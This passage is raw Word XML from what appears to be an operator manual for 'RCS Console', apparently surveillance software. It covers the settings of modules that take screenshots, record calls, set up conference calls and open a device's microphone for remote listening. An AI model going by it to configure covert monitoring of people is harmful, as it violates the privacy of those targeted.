          <w:p w:rsidR="00332A81" w:rsidRPr="00A52C9B" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># Target # </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Factory #</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Module (Screenshot)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1328" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:94.5pt;z-index:251851776;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId314" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1328" DrawAspect="Content" ObjectID="_1446455393" r:id="rId315"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5383" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quality</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the image quality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="00D641D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="00D641D7">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D641D7" w:rsidTr="00332A81">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00EF3D51" w:rsidP="006311A1">
            <w:r>
              <w:object w:dxaOrig="5625" w:dyaOrig="2835">
                <v:shape id="_x0000_i1108" type="#_x0000_t75" style="width:187.5pt;height:94.5pt" o:ole="">
                  <v:imagedata r:id="rId316" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1108" DrawAspect="Content" ObjectID="_1446455323" r:id="rId317"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.29</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00A52C9B" w:rsidRDefault="00332A81" w:rsidP="00332A8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(Call)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EF3D51" w:rsidRPr="00332A81" w:rsidRDefault="00EF3D51" w:rsidP="00116CFD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enable call recording</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00116CFD" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>enables call recording. If disabled, call audio is not recorded.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRPr="00332A81" w:rsidRDefault="00332A81" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Buffer size</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the buffer size used for audio sectors.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D641D7" w:rsidRPr="00332A81" w:rsidRDefault="00D641D7" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quality</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the audio quality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EF3D51" w:rsidRDefault="00EF3D51" w:rsidP="00EF3D51">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="00EF3D51">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EF3D51" w:rsidTr="00B61AFC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00332A81" w:rsidRDefault="00732ABF" w:rsidP="00332A81">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.30</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00332A81">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00332A81" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EF3D51" w:rsidRPr="00A52C9B" w:rsidRDefault="00332A81" w:rsidP="00332A81">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(Conference)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1205" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:102.75pt;z-index:251799552;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId318" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1205" DrawAspect="Content" ObjectID="_1446455394" r:id="rId319"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EF3D51" w:rsidRDefault="00EF3D51" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00EF3D51" w:rsidRPr="00332A81" w:rsidRDefault="00EF3D51" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EF3D51" w:rsidRPr="00332A81" w:rsidRDefault="00EF3D51" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00EF3D51" w:rsidRPr="00332A81" w:rsidRDefault="00EF3D51" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00015715" w:rsidRPr="00332A81">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the receiver's phone number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007C4AE3" w:rsidRDefault="007C4AE3" w:rsidP="007C4AE3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B61AFC" w:rsidRDefault="00B61AFC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w: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9"/>
        <w:gridCol w:w="5370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B61AFC" w:rsidTr="00B61AFC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B61AFC" w:rsidRDefault="003A4380" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1331" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:102.75pt;z-index:251852800;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId320" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1331" DrawAspect="Content" ObjectID="_1446455395" r:id="rId321"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B61AFC" w:rsidRDefault="00732ABF" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.31</w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00B61AFC" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B61AFC" w:rsidRPr="00A52C9B" w:rsidRDefault="00B61AFC" w:rsidP="006954F7">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(Livemic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B61AFC" w:rsidRPr="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B61AFC" w:rsidRPr="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B61AFC" w:rsidRPr="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="006954F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B61AFC">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00B61AFC">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidRPr="00B61AFC">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the phone number used for listening. It must include the international country code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B61AFC" w:rsidRDefault="00B61AFC" w:rsidP="007C4AE3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00332A81" w:rsidRDefault="00332A81" w:rsidP="007C4AE3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9628"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF782C" w:rsidTr="006954F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
